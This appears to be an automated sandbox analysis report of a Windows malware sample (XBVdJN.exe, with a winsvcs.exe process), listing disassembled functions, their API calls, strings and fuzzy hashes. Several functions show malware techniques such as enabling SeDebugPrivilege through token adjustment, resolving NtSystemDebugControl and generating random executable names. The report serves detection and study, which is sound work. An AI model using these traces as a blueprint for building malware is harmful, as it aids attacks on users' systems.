Instruction ID: 5337cf751e049fb57fae81e6579d7f7b3685e694cdd71f9436aeba2bc33a54d9
Opcode Fuzzy Hash: 861147a20537297b13c17c18e3f2a5abab140c8ecad6b68387f59e54b0110f68
Instruction Fuzzy Hash: ED0175719012687BCB21AB96DC4CDDF7F3EEF45730F104021F915AA150D6714A18CBA0

Function 006E2692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,006E29DB,?,00000001), ref: 006E26A7
WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,006E29DB,?,00000001), ref: 006E26B5
lstrlen.KERNEL32(?), ref: 006E26C4
??2@YAPAXI@Z.MSVCRT ref: 006E26CE
lstrcpy.KERNEL32(00000004,?), ref: 006E26E3
lstrcpy.KERNEL32(?,00000004), ref: 006E271F
??3@YAXPAX@Z.MSVCRT ref: 006E272D
SetEvent.KERNEL32 ref: 006E273C

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: 578adfbd09c2513c876bf6bd2a0b394c2a2c7ae256d492c1e640f8059652d35e
Instruction ID: d8b035d97d384eec1d1d7c5a79e8b7cc70b770c82b8585328d7b67b6cd1974b2
Opcode Fuzzy Hash: 578adfbd09c2513c876bf6bd2a0b394c2a2c7ae256d492c1e640f8059652d35e
Instruction Fuzzy Hash: 8B119035501391EFCB219F26EC8C8AA7BAFFF847607105019F8548F220DB708D86DB90

Function 006E1B8A Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 006E1BCD
rand.MSVCRT ref: 006E1BD8
memset.MSVCRT ref: 006E1C43
memcpy.MSVCRT ref: 006E1C4F
lstrcat.KERNEL32(?,.exe), ref: 006E1C5D

Strings

.exe, xrefs: 006E1C57

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe
API String ID: 122620767-4119554291
Opcode ID: 55bdbb74214ef5aec886aa8c33e007da659b7808b5fb8fcb63f74b42d1a18a2a
Instruction ID: 87e4bac3da683fa53cec2a2ba77ec9b909a5e875afe4bd8b4159d364488882d5
Opcode Fuzzy Hash: 55bdbb74214ef5aec886aa8c33e007da659b7808b5fb8fcb63f74b42d1a18a2a
Instruction Fuzzy Hash: 4921BE32E463E06ED3151337ACC4BAD3F079FE3B20F261099F4910F392D5740982A264

Function 006E139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006E13BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006E13DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 006E1448

Part of subcall function 006E119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,?,?,006E13EF), ref: 006E11AB
Part of subcall function 006E119F: OpenProcessToken.ADVAPI32(00000000,00000028,006E13EF,?,?,?,?,?,?,006E13EF), ref: 006E11BB
Part of subcall function 006E119F: AdjustTokenPrivileges.ADVAPI32(006E13EF,00000000,?,00000010,00000000,00000000), ref: 006E11EB
Part of subcall function 006E119F: CloseHandle.KERNEL32(006E13EF), ref: 006E11FA
Part of subcall function 006E119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,006E13EF), ref: 006E1203

Strings

SeDebugPrivilege, xrefs: 006E13D3
C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006E13A8

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe$SeDebugPrivilege
API String ID: 4123949106-3984717035
Opcode ID: 3c5cb5ccc79fad391a1b17d6e0934c38bd26a346b471b35e962833af7e2e3654
Instruction ID: dca8c3ea17dd3e520e814b34638e804b115d9afc45f57766fd106ee77595b676
Opcode Fuzzy Hash: 3c5cb5ccc79fad391a1b17d6e0934c38bd26a346b471b35e962833af7e2e3654
Instruction Fuzzy Hash: 49315171E01389EADF60DBA68C45FEEBBFAEB45704F204069E505BA281D6309A45DF60

Function 006E1319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 006E1334
GetProcAddress.KERNEL32(00000000), ref: 006E133B
memset.MSVCRT ref: 006E1359

Strings

NtSystemDebugControl, xrefs: 006E132A
ntdll.dll, xrefs: 006E132F

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: ffcfacf23d184d99374a5f17b72057c2e4997c97d199087664456bbd6863bd52
Instruction ID: 90e6c7015ea8015584fcb8f1fc9cf0be1dc3d795e09eba57e570bde4f59406c8
Opcode Fuzzy Hash: ffcfacf23d184d99374a5f17b72057c2e4997c97d199087664456bbd6863bd52
Instruction Fuzzy Hash: 8D01A17160239DEFDB10DFA5ECC89AFBB6AFB02304F00016AF901AA241D6708645DA50

Function 006E1DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 006E1E0B
lstrcpy.KERNEL32(?,00000001), ref: 006E1E1C
strrchr.MSVCRT ref: 006E1E2B
lstrcmpiA.KERNEL32(?,006E4488), ref: 006E1E48
lstrlen.KERNEL32(006E4488), ref: 006E1E53

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 40e49548ee5daaaf27d8608ea4e805269063e08125f45ea3f9f3c05f8d0067ec
Instruction ID: 69e48ecb906a7c2719499d96515c8a0551c52ea4ddbba921cd7b8be56ec93d6c
Opcode Fuzzy Hash: 40e49548ee5daaaf27d8608ea4e805269063e08125f45ea3f9f3c05f8d0067ec
Instruction Fuzzy Hash: 0D01FE72D143A96FDB105770DC4CBD677DEDB05310F140065FA45D7190DA749E858B90

Function 006E185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(006E1F92,00000000,?,00000000,?,?,?,006E1F92,?,00000000,00000002), ref: 006E1867
srand.MSVCRT ref: 006E1878
rand.MSVCRT ref: 006E1880
srand.MSVCRT ref: 006E1890
rand.MSVCRT ref: 006E1894

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID:
API String ID: 4106363736-0
Opcode ID: d900789626ec7aed877ec7f78eb5c954b1c360f04c85cddbcb415ecbcaeba368
Instruction ID: 2abd4be3940f3a58abb772ceeb4b09a510d557174aac219dd60d08297f0ca705
Opcode Fuzzy Hash: d900789626ec7aed877ec7f78eb5c954b1c360f04c85cddbcb415ecbcaeba368
Instruction Fuzzy Hash: 63E04877A10328BBD700A7F9EC8A99EBBADDE84161B110567F600D3354E574FD448BB8

Function 006E6014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 006E603C
GetProcAddress.KERNEL32(00000000,006E6064), ref: 006E604F

Strings

kernel32.dll, xrefs: 006E603B

Memory Dump Source

Source File: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: 7af7157fc7b0a5e4cf8c469d21516864f13fc23057d98dd9cabf12fe1f1dd7b9
Instruction ID: 6d5080a5a3f06ba3791582a5aa1536657d22dcfd49a6f01eb81acc34d1e67131
Opcode Fuzzy Hash: 7af7157fc7b0a5e4cf8c469d21516864f13fc23057d98dd9cabf12fe1f1dd7b9
Instruction Fuzzy Hash: 53F0CDB11413998BEF70CEA5CC44BDE3BE5EB25750F50442AEA09CB281DB7486058B25

Analysis Process: winsvcs.exePID: 3796, Parent PID: 4004COMMON

Executed Functions

Function 0040B517 Relevance: 884.2, APIs: 488, Strings: 15, Instructions: 3992windowtimethreadCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000007B), ref: 0040B567
GetClientRect.USER32(?,?), ref: 0040B578
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001,?,?,?,0000007B), ref: 0040B59E
InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,0000007B), ref: 0040B5A9
GetDC.USER32(0044A660), ref: 0040B61C
CreateFontIndirectA.GDI32(0044AEE8), ref: 0040B63E
SelectObject.GDI32(0044A655,00000000), ref: 0040B648
SendMessageA.USER32(?,00000030,00000000,00000001), ref: 0040B654
SetTextColor.GDI32(0044A655,?), ref: 0040B662
MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6D7
LineTo.GDI32(0044A654,B8003FFD,0044A652), ref: 0040B6EA
MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6F5
LineTo.GDI32(0044A654,B8004000,0044A555), ref: 0040B701
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B712
LineTo.GDI32(0044A654,?,?), ref: 0040B727
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B738
LineTo.GDI32(0044A654,B8004000,?), ref: 0040B74B
CreateSolidBrush.GDI32(0014C8C8), ref: 0040B7A2
LoadCursorA.USER32(00000000,00007F02), ref: 0040B7B6
LoadIconA.USER32(00000000,00007F02), ref: 0040B7CA
GetModuleHandleA.KERNEL32(00000000,?,00000030,00000000,00000001), ref: 0040B7E7
LoadIconA.USER32(00000000), ref: 0040B7F6
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040B838
GetClientRect.USER32(00000000,?), ref: 0040B849
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040B870
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040B899
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040B8A6
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040B8B5
GetModuleHandleA.KERNEL32(00000000,?,?,00000030,00000000,00000001), ref: 0040B8BD
LoadBitmapA.USER32(00000000,00000000), ref: 0040B8CF
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040B8E7
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040B8FF
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040B99B
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040B9B4
MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040B9C5
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040B9D8
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9E3
LineTo.GDI32(0044A654,?,00000770), ref: 0040B9F2
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9FD
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040BA09
GetDC.USER32(0044A660), ref: 0040BA7C
CreateFontIndirectA.GDI32(0044AF28), ref: 0040BA9E
SelectObject.GDI32(0044A655,00000000), ref: 0040BAA8
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040BAB4
SetTextColor.GDI32(0044A655,?), ref: 0040BAC2
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BB9C
LineTo.GDI32(0044A654,B8003FFD,?), ref: 0040BBB5
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBC6
LineTo.GDI32(0044A654,B8004000,?), ref: 0040BBD9
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBE4
LineTo.GDI32(0044A654,?,?), ref: 0040BBF3
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBFE
LineTo.GDI32(0044A654,B8004000,?), ref: 0040BC0A
CreateSolidBrush.GDI32(0014C8C8), ref: 0040BC48
LoadCursorA.USER32(00000000,00007F02), ref: 0040BC5C
LoadIconA.USER32(00000000,00007F02), ref: 0040BC70
GetModuleHandleA.KERNEL32(00000000), ref: 0040BC8D
LoadIconA.USER32(00000000), ref: 0040BC9C
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BCDE
GetClientRect.USER32(00000000,?), ref: 0040BCEF
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BD16
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BD3F
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BD4C
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BD5B
GetModuleHandleA.KERNEL32(00000000), ref: 0040BD63
LoadBitmapA.USER32(00000000), ref: 0040BD75
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BD8D
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BDA5
CreateSolidBrush.GDI32(0014C8C8), ref: 0040BE3E
LoadCursorA.USER32(00000000,00007F02), ref: 0040BE52
LoadIconA.USER32(00000000,00007F02), ref: 0040BE66
GetModuleHandleA.KERNEL32(00000000), ref: 0040BE83
LoadIconA.USER32(00000000), ref: 0040BE92
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BED2
GetClientRect.USER32(00000000,?), ref: 0040BEE3
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BF0A
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BF33
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BF40
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BF4F
GetModuleHandleA.KERNEL32(00000000), ref: 0040BF57
LoadBitmapA.USER32(00000000), ref: 0040BF69
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BF81
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BF99
GetDC.USER32(0044A660), ref: 0040C00C
CreateFontIndirectA.GDI32(0044AF68), ref: 0040C02E
SelectObject.GDI32(0044A655,00000000), ref: 0040C03D
SendMessageA.USER32(0044A660,00000030,?,00000001), ref: 0040C050
SetTextColor.GDI32(0044A655,?), ref: 0040C05E
GetDlgItem.USER32(0044A660,0000007B), ref: 0040C0B0
GetClientRect.USER32(0044A660,?), ref: 0040C0C1
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C0E7
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C0F2
CreateSolidBrush.GDI32(0014C8C8), ref: 0040C149
LoadCursorA.USER32(00000000,00007F02), ref: 0040C15D
LoadIconA.USER32(00000000,00007F02), ref: 0040C171
GetModuleHandleA.KERNEL32(00000000), ref: 0040C18E
LoadIconA.USER32(00000000), ref: 0040C19D
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C1DF
GetClientRect.USER32(00000000,?), ref: 0040C1F0
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C217
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C240
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C24D
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C25C
GetModuleHandleA.KERNEL32(00000000), ref: 0040C264
LoadBitmapA.USER32(00000000,00000000), ref: 0040C276
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C28E
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C2A6
GetDC.USER32(0044A660), ref: 0040C33F
CreateFontIndirectA.GDI32(0044AFA8), ref: 0040C361
SelectObject.GDI32(0044A655,00000000), ref: 0040C36B
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C377
SetTextColor.GDI32(0044A655,?), ref: 0040C385
GetDC.USER32(0044A660), ref: 0040C41F
CreateFontIndirectA.GDI32(0044AFE8), ref: 0040C441
SelectObject.GDI32(0044A655,00000000), ref: 0040C44B
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C457
SetTextColor.GDI32(0044A655,?), ref: 0040C465
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C507
LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040C51A
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C525
LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040C531
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C542
LineTo.GDI32(0044A654,?,?), ref: 0040C557
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C568
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C57B
GetDlgItem.USER32(0044A660,0000007B), ref: 0040C5B7
GetClientRect.USER32(0044A660,?), ref: 0040C5C8
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C5EE
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C5F9
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C674
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040C68D
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C69E
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C6B1
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6BC
LineTo.GDI32(0044A654,?,0044A658), ref: 0040C6CB
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6D6
LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040C6E2
CreateSolidBrush.GDI32(0014C8C8), ref: 0040C720
LoadCursorA.USER32(00000000,00007F02), ref: 0040C734
LoadIconA.USER32(00000000,00007F02), ref: 0040C748
GetModuleHandleA.KERNEL32(00000000), ref: 0040C765
LoadIconA.USER32(00000000), ref: 0040C774
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C7B6
GetClientRect.USER32(00000000,?), ref: 0040C7C7
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C7EE
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C817
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C824
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C833
GetModuleHandleA.KERNEL32(00000000), ref: 0040C83B
LoadBitmapA.USER32(00000000), ref: 0040C84D
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C865
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C87D
GetDlgItem.USER32(0044A660,0000007B), ref: 0040C8D0
GetClientRect.USER32(0044A660,?), ref: 0040C8E1
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C907
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C912
GetDC.USER32(0044A660), ref: 0040C985
CreateFontIndirectA.GDI32(0044B028), ref: 0040C9A7
SelectObject.GDI32(0044A655,00000000), ref: 0040C9B1
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C9BD
SetTextColor.GDI32(0044A655,?), ref: 0040C9CB
GetDlgItem.USER32(0044A660,0000007B), ref: 0040CA14
GetClientRect.USER32(0044A660,?), ref: 0040CA25
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CA4B
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CA56
GetDC.USER32(0044A660), ref: 0040CAC9
CreateFontIndirectA.GDI32(0044B068), ref: 0040CAEB
SelectObject.GDI32(0044A655,00000000), ref: 0040CAF5
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CB01
SetTextColor.GDI32(0044A655,?), ref: 0040CB0F
CreateSolidBrush.GDI32(0014C8C8), ref: 0040CB4D
LoadCursorA.USER32(00000000,00007F02), ref: 0040CB61
LoadIconA.USER32(00000000,00007F02), ref: 0040CB75
GetModuleHandleA.KERNEL32(00000000), ref: 0040CB92
LoadIconA.USER32(00000000), ref: 0040CBA1
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040CBE3
GetClientRect.USER32(00000000,?), ref: 0040CBF4
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040CC1B
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040CC44
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040CC51
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040CC60
GetModuleHandleA.KERNEL32(00000000), ref: 0040CC68
LoadBitmapA.USER32(00000000), ref: 0040CC7A
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040CC92
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040CCAA
GetDC.USER32(0044A660), ref: 0040CD1D
CreateFontIndirectA.GDI32(0044B0A8), ref: 0040CD3F
SelectObject.GDI32(0044A655,00000000), ref: 0040CD49
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CD55
SetTextColor.GDI32(0044A655,?), ref: 0040CD63
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CDD7
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CDF0
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CE01
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CE14
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE1F
LineTo.GDI32(0044A654,?,00000770), ref: 0040CE2E
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE39
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040CE45
GetDlgItem.USER32(0044A660,0000007B), ref: 0040CE81
GetClientRect.USER32(0044A660,?), ref: 0040CE92
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CEB8
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CEC3
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CF37
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CF50
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CF61
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CF74
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF7F
LineTo.GDI32(0044A654,?,0044A658), ref: 0040CF8E
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF99
LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040CFA5
GetDC.USER32(0044A660), ref: 0040D018
CreateFontIndirectA.GDI32(0044B0E8), ref: 0040D03A
SelectObject.GDI32(0044A655,00000000), ref: 0040D044
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D050
SetTextColor.GDI32(0044A655,?), ref: 0040D05E
GetDlgItem.USER32(0044A660,0000007B), ref: 0040D0A6
GetClientRect.USER32(0044A660,?), ref: 0040D0B7
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D0DD
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D0E8
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D15C
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D175
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D186
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D199
